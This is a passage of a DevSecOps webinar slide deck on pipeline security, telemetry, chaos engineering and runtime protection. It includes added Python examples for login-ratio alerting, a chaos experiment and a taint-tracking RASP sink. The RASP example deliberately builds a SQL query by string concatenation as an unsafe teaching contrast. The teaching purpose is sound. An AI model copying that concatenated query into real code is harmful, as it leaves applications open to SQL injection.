    • Allocate time for the improvement of daily work
    • Create rituals that reward the team for taking risks
    • Introduce faults into the system to increase resilience
    Source: Kim, Gene. 2012. ‘The Three Ways: The Principles Underpinning DevOps’. IT Revolution. August 22. http://itrevolution.com/the-three-ways-principles-underpinning-devops/.
  • 11. The Benefits of DevOps
    • High-performing organizations are decisively outperforming their lower-performing peers in terms of throughput.
    • High performers have better employee loyalty, as measured by employee Net Promoter Score (eNPS).
    • Improving quality is everyone’s job.
    • High performers spend 50 percent less time remediating security issues than low performers.
    • Taking an experimental approach to product development can improve your IT and organizational performance.
    • Undertaking a technology transformation initiative can produce sizeable cost savings for any organization.
    Source: ‘2016 State of DevOps Report’. 2017. Puppet. Accessed January 23. https://puppet.com/resources/white-paper/2016-state-of-devops-report.
  • 12. DevOps Maturity Model
    Initial
    • Poor, ad hoc communication
    • No automation
    • Unpredictable, uncontrolled, reactive process
    Managed
    • Managed communication, some shared decision making
    • Siloed automation, no central infrastructure
    • Processes are managed but not standardised
    Defined
    • Collaboration, shared decision making and accountability
    • Central automated processes across the application lifecycle
    • Processes are standardised across the organisation
    Measured
    • Collaboration-based processes are measured to identify inefficiencies and bottlenecks
    • Collect and analyse metrics of the automated processes and measure them against the business goals
    • Visibility and predictability of entire-process quality and performance
    Optimised
    • Effective knowledge sharing and individual empowerment
    • Self-service automation, self-learning using analytics, and self-remediation
    • Process risk and cost optimisation
  • 13. The Move to DevOps: Market Trends and Enabling Technologies
  • 14. Before We Had DevOps
  • 15. Cloud Technology and CI/CD Platforms
  • 16. Configuration Management Tools
  • 17. What Makes a Good DevSecOps Solution?
    • Fail quickly, through automation: provide security feedback as early as possible, in DevOps tools
    • Limit time-to-market impact: ease of use, actionable findings, speed, low false positives
    • Support team autonomy with enterprise orchestration: provide privacy early in the SDLC; measure and assess teams, compliance and risk later
    • Adapt to the latest practices and technologies: microservices, Infrastructure as Code, leading-edge languages and frameworks, containerization
    • Support a culture of learning and openness: developer communities; small, consumable courses; open documentation; integrations in marketplaces
    • Provide operational visibility: provide feedback from Ops (Prod and QA) about risks and attacks in a way that is consumable by development
  • 18. The Impact to Operations
  • 19. Three Cornerstones
    • Collaboration
      – Very little crossover between teams; specific roles and responsibilities
      – Collaborate flexibly through flexible tools (e.g. Slack)
    • Flexibility
      – Previously focused on stability over everything else
      – Modern organisations need to be flexible and responsive
    • Automation
      – Manual changes cannot keep pace with the rapid turnaround times required
      – Frees up resources for critical-thinking tasks and problem solving
  • 20. “Infrastructure as Code”
    https://puppet.com/blog/what-is-infrastructure-as-code
  • 21. Site Reliability Engineering: It’s All Software Now
    • Defined by Ben Treynor: “what happens when a software engineer is tasked with what used to be called operations.”
    • The ideal SRE candidate is a coder who also has operational and systems knowledge and likes to whittle down complex tasks.
    • SREs typically spend their time as follows:
      – up to 50% of their time doing “ops”-related work
      – up to 50% of their time on development tasks such as new features, scaling or automation
    https://en.wikipedia.org/wiki/Site_reliability_engineering
  • 22. Best Practices for Securing Operations
  • 23. Control Your Source Code Repositories
    • Continuous Deployment means any code checked in can potentially reach production within minutes
    • Best practices include:
      – Splitting repositories
      – Using Perforce for fine-grained control
      – Performing peer reviews on ‘pull requests’ to critical code
  • 24. Protect Your Deployment Pipeline
    • Continuous Deployment means that your pipeline is a critical piece of infrastructure
    • Best practices include:
      – Hardening CI/CD systems to prevent compromise
      – Reviewing changes to prevent execution of unwanted code
      – Testing for suspicious API calls in unit tests or scripts
      – Ensuring CI/CD runs in isolated containers
      – Ensuring VCS credentials are ‘read only’
  • 25. Using Security Testing Tools
    • Behaviour-Driven Development security testing
    • IDE integrations for security testing
  • 26. Integrate Security Into Your Deployment Pipeline: VSTS/TFS
  • 27. Integrate Security Into Your Deployment Pipeline: Jenkins
  • 28. Security Telemetry in Applications
    • Record all security-relevant events, such as:
      – Successful and unsuccessful logins
      – User password resets
      – User e-mail address resets
      – User credit card changes
    • Monitor changes in the ratio of successes to failures
    • Alert on events such as:
      – Anomalous behaviour
      – Sudden changes in values
  • 29. Security Telemetry in the Environment
    • Monitor environmental items and events, such as:
      – OS changes
      – Security group changes
      – Changes to configurations
      – Cloud infrastructure changes
      – Web server errors
  • 30. Use the Right Tool for the Job
    https://www.slideshare.net/YuryChemerkin/zane-lackey-security-at-scale-web-application-security-in-a-continuous-deployment-environment
  • 31. Use the Right Tool for the Job
    https://www.slideshare.net/YuryChemerkin/zane-lackey-security-at-scale-web-application-security-in-a-continuous-deployment-environment
  • 32. Case Study: Security Telemetry at Etsy
    • Nick Galbreath (Director of Engineering at Etsy, 2010):
      – No dedicated fraud control or Infosec team
      – Embedded telemetry within the entire DevOps value stream
      – Everyone was responsible for monitoring and alerting
    • Example events:
      – Abnormal program termination (segfaults)
      – Database syntax errors
      – Indications of SQL attack
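The telemetry of slides 28 and 32 in working form, as an added example that is not part of the webinar or of any Veracode or Etsy code. The log format, the sample lines, the one-minute window size and the per-event alert thresholds are all constructed for this example. It computes the success:failure ratio of logins per window and flags a sudden drop, and separately counts the Etsy-style indicator events (segfaults, database syntax errors) against a threshold.

```python
"""Security telemetry over application log lines.

Added example (not from the webinar or Veracode). The log format and the
sample lines below are constructed for illustration: one event per line,
"<ISO timestamp> <event.name> key=value ...".
"""
from collections import Counter
from dataclasses import dataclass
from datetime import datetime

SAMPLE_LOG = """\
2017-01-23T10:00:01 login.success user=alice
2017-01-23T10:00:05 login.failure user=bob reason=bad_password
2017-01-23T10:00:09 login.success user=carol
2017-01-23T10:00:30 login.success user=dave
2017-01-23T10:00:40 password.reset user=alice
2017-01-23T10:01:02 login.failure user=alice reason=bad_password
2017-01-23T10:01:04 login.failure user=alice reason=bad_password
2017-01-23T10:01:06 login.failure user=erin reason=bad_password
2017-01-23T10:01:08 login.failure user=frank reason=bad_password
2017-01-23T10:01:10 login.success user=grace
2017-01-23T10:01:15 db.syntax_error query_id=77
2017-01-23T10:01:20 db.syntax_error query_id=78
2017-01-23T10:01:25 process.segfault pid=4242
"""

# Events the Etsy case study treated as attack indicators; the per-window
# thresholds are an assumption made for this example.
INDICATOR_THRESHOLDS = {"db.syntax_error": 1, "process.segfault": 1}


@dataclass
class Event:
    ts: datetime
    name: str
    fields: dict

    @property
    def window(self) -> str:
        # One-minute buckets; the ratio logic works for any bucket size.
        return self.ts.strftime("%Y-%m-%dT%H:%M")


def parse_log(text: str) -> list:
    """Parse the constructed log lines into Event objects, skipping blanks."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, name, *kv = line.split()
        fields = dict(item.split("=", 1) for item in kv)
        events.append(Event(datetime.fromisoformat(ts), name, fields))
    return events


def success_ratio_by_window(events) -> dict:
    """Fraction of login attempts that succeeded, per one-minute window."""
    ok, total = Counter(), Counter()
    for e in events:
        if e.name in ("login.success", "login.failure"):
            total[e.window] += 1
            if e.name == "login.success":
                ok[e.window] += 1
    return {w: ok[w] / total[w] for w in sorted(total)}


def ratio_alerts(ratios: dict, max_drop: float = 0.5) -> list:
    """Windows where the success ratio fell by more than max_drop versus the
    previous window: the 'sudden change in values' the slide alerts on."""
    alerts, prev = [], None
    for window in sorted(ratios):
        if prev is not None and prev - ratios[window] > max_drop:
            alerts.append(window)
        prev = ratios[window]
    return alerts


def attack_indicator_counts(events) -> Counter:
    """Count the Etsy-style indicator events (segfaults, DB syntax errors)."""
    return Counter(e.name for e in events if e.name in INDICATOR_THRESHOLDS)


def indicator_alerts(counts: Counter) -> list:
    """Indicator names whose count reached the configured threshold."""
    return sorted(n for n, c in counts.items() if c >= INDICATOR_THRESHOLDS[n])


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    ratios = success_ratio_by_window(evs)
    print("login success ratio per minute:", ratios)
    print("ratio alerts:", ratio_alerts(ratios))
    counts = attack_indicator_counts(evs)
    print("indicator counts:", dict(counts), "alerts:", indicator_alerts(counts))
```

On the sample data the first minute has three successes and one failure (ratio 0.75) and the second minute one success and four failures (0.2), so the ratio check fires for the second window; the two database syntax errors and the segfault each cross their threshold. The ratio check is deliberately relative rather than absolute: a site whose normal failure rate is 30% would page constantly on a fixed limit, which is the "security is not a binary event" point of slide 34.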
  • 33. Automated Dashboards: “Measure All The Things”
  • 34. “Security Is Not A Binary Event”
    https://www.slideshare.net/nickgsuperstar/devopssec-apply-devops-principles-to-security
  • 35. Logging for Security
    • Logs are the ‘bread and butter’ of an IT Operations team
    • Challenges when used in a security context:
      – Delayed response to identify issues (delays in alerting)
      – Limited data (no POST body, no header data)
      – Limited context (disparate events in several locations)
    Source: Phillip Maddux, https://medium.com/@foospidy
  • 36. Destructive Testing / Chaos Engineering
    Chaos Engineering is the discipline of experimenting on a distributed system in order to build confidence in the system’s capability to withstand turbulent conditions in production. It proceeds in four steps:
    • Build a hypothesis around steady-state behaviour.
    • Vary real-world events.
    • Run experiments in production.
    • Automate experiments to run continuously.
    “The best way to avoid failure is to fail constantly.” - Jeff Atwood
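The four steps above carried through on a toy system, as an added example that is not part of the webinar and not code from Netflix or any chaos tool. The "service" is a constructed in-memory pool of three replicas behind a round-robin client that retries once on the next replica; the injected event is a replica outage, and the steady-state metric and the 2% tolerance are assumptions made for the example.

```python
"""A chaos experiment in miniature.

Added example (not from the webinar, Netflix or any chaos tool). The
'service' is a constructed in-memory pool of replicas with a round-robin
client that retries once on the next replica; the failure injection just
marks a replica unhealthy. The four steps from the slide map onto the
functions below.
"""


class Replica:
    def __init__(self, name: str):
        self.name = name
        self.healthy = True

    def handle(self, request: int) -> str:
        if not self.healthy:
            raise ConnectionError(f"{self.name} is down")
        return f"ok:{request}"


class Client:
    """Round-robin client: each request starts at the next replica and is
    retried on the following replica at most `retries` times."""

    def __init__(self, replicas, retries: int = 1):
        self.replicas = replicas
        self.retries = retries
        self.cursor = 0

    def call(self, request: int) -> bool:
        start = self.cursor
        self.cursor = (self.cursor + 1) % len(self.replicas)
        for attempt in range(self.retries + 1):
            replica = self.replicas[(start + attempt) % len(self.replicas)]
            try:
                replica.handle(request)
                return True
            except ConnectionError:
                continue
        return False


# Step 1: define the steady state as a measurable metric.
def steady_state(client: Client, requests: int = 300) -> float:
    """Fraction of requests that succeed: the system's steady-state metric."""
    return sum(client.call(i) for i in range(requests)) / requests


def hypothesis_holds(observed: float, baseline: float, tolerance: float = 0.02) -> bool:
    """Hypothesis: under the injected fault the success rate stays within
    `tolerance` of the baseline measured before the fault."""
    return observed >= baseline - tolerance


# Step 2: vary a real-world event (here: replica outages).
def inject_replica_outage(replicas, how_many: int) -> None:
    for replica in replicas[:how_many]:
        replica.healthy = False


def run_experiment(replicas_down: int, replica_count: int = 3) -> dict:
    """Step 3: one experiment. Measure the baseline, inject the fault, measure
    again and evaluate the hypothesis. Returns the evidence, not just a verdict."""
    replicas = [Replica(f"replica-{i}") for i in range(replica_count)]
    client = Client(replicas)
    baseline = steady_state(client)
    inject_replica_outage(replicas, replicas_down)
    observed = steady_state(client)
    return {
        "replicas_down": replicas_down,
        "baseline": baseline,
        "observed": observed,
        "passed": hypothesis_holds(observed, baseline),
    }


def run_suite(max_down: int = 2) -> list:
    """Step 4: automate. Run the experiment for every outage size so the
    result is recomputed on every deploy rather than once by hand."""
    return [run_experiment(n) for n in range(max_down + 1)]


if __name__ == "__main__":
    for result in run_suite():
        print(result)
```

With one retry the pool survives a single outage at a 100% success rate, but a second outage drops the rate to two thirds and the hypothesis fails: that is the finding a chaos experiment is meant to surface before production does, and the reason the suite should run continuously rather than once.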
  • 37. Case Study: Netflix
  • 38. Operating System Hardening
    • Disable unused and/or guest accounts
    • Run at the level of least privilege
    • Disable unused services
    • Ensure automatic updates are enabled
    • Ensure strong passwords are used
    • Disable overly verbose logging
    • Ensure backups are performed
  • 39. Runtime Application Self-Protection
    What is RASP?
    • An ‘agent’ that executes in parallel with an application and provides run-time protection by monitoring traffic through the application.
    • It tracks data propagation through the application to determine whether input data is ‘tainted’ during its lifetime.
    • If data is tainted then it is possible that the application is under attack, and the agent can then protect the application at run-time.
    Benefits of RASP
    • Very low false positives and false negatives.
    • Requires no modification to application source code.
    • Can report attack information into a SIEM.
    • Can be deployed onto legacy applications and platforms.
    • Can execute in ‘monitor’ or ‘alert’ mode to identify attacks without protecting the application (IAST).
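The taint-propagation idea behind RASP in miniature, as an added example that is not part of the webinar and not any vendor's RASP agent. The "agent" is a `Tainted` string subclass that carries an untrusted-origin mark through the string operations it overrides, plus a guarded SQL sink whose executor is a stub that only records what it would run; the query text, table name, user names and the block/monitor mode names are constructed for the example.

```python
"""Taint tracking in miniature, the idea behind a RASP agent.

Added example (not from the webinar and not any vendor's RASP product). The
'agent' here is a str subclass that remembers its untrusted origin and
propagates that mark through the string operations it overrides, plus a
guarded SQL sink whose executor is a stub that only records queries. The
query text, table and user names are constructed for the example.
"""


class Tainted(str):
    """A string derived from untrusted input. Operations that build a new
    string from it return a Tainted string, so the mark propagates."""

    def __add__(self, other):
        return Tainted(str.__add__(self, other))

    def __radd__(self, other):
        # Python tries the subclass's reflected method first, so
        # "literal" + Tainted(...) lands here and stays tainted.
        return Tainted(str.__add__(other, self))

    def strip(self, *args):
        return Tainted(str.strip(self, *args))

    def lower(self):
        return Tainted(str.lower(self))


def untrusted(value: str) -> Tainted:
    """Mark data at the trust boundary (request parameter, header, form field)."""
    return Tainted(value)


def untaint(value: str, validator) -> str:
    """Drop the mark only after the value has passed an explicit validator."""
    if not validator(value):
        raise ValueError("input rejected by validator")
    return str(value)


class RaspSink:
    """Guards the SQL executor. In 'block' mode a tainted query is refused;
    in 'monitor' mode it is recorded and allowed through (the slide's
    monitor/alert mode)."""

    def __init__(self, mode: str = "block"):
        self.mode = mode
        self.alerts = []      # queries that reached the sink still tainted
        self.executed = []    # what the stubbed executor would have run

    def execute(self, query: str, params=()):
        if isinstance(query, Tainted):
            self.alerts.append(str(query))
            if self.mode == "block":
                raise PermissionError("tainted data reached the SQL sink")
        self.executed.append((str(query), tuple(params)))


def lookup_user_unsafe(sink: RaspSink, username: str):
    # Query text built by concatenation: the taint flows into the query itself.
    sink.execute("SELECT id FROM users WHERE name = '" + username + "'")


def lookup_user_safe(sink: RaspSink, username: str):
    # Parameterised query: the query text is a trusted literal and the
    # untrusted value travels as a parameter, so the sink sees no taint.
    sink.execute("SELECT id FROM users WHERE name = ?", (username,))


if __name__ == "__main__":
    sink = RaspSink(mode="monitor")
    lookup_user_unsafe(sink, untrusted("alice"))
    lookup_user_safe(sink, untrusted("alice"))
    print("alerts:", sink.alerts)
    print("executed:", sink.executed)
```

Note that the decision is made on provenance, not on the content of the input: an ordinary username still trips the sink when it has been concatenated into the query text, while the parameterised form passes with the same input. The wrapper-type approach also shows why real agents hook the runtime instead: an f-string or `str.format` call produces a plain `str` and silently drops the mark.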
  • 40. Change Management Process
    • The ITIL change management process defines three types of change:
      – Standard (low-risk, follows a standard process, can be automated)
      – Normal (requires approval by the CAB, manual process)
      – Emergency (high-priority CAB)
    • Too many changes are classified as ‘normal’
    • DevOps best practice suggests:
      – Try to make as much as possible ‘standard’ and auto-approve it
      – Optimise the CAB process for the requests that remain ‘normal’
  • 41. Make a Commitment: Security is Everyone’s Responsibility
    • Learn how to code!
    • Learn the ‘tools of the trade’ (Git, Ansible, etc.)
    • Learn the basics with a test application, e.g. WebGoat.Net
    • Learn how a Version Control System works
    • Automate a repetitive task
    • Experience a ‘Day in the Life’ of a Developer
  • 42. Thank You!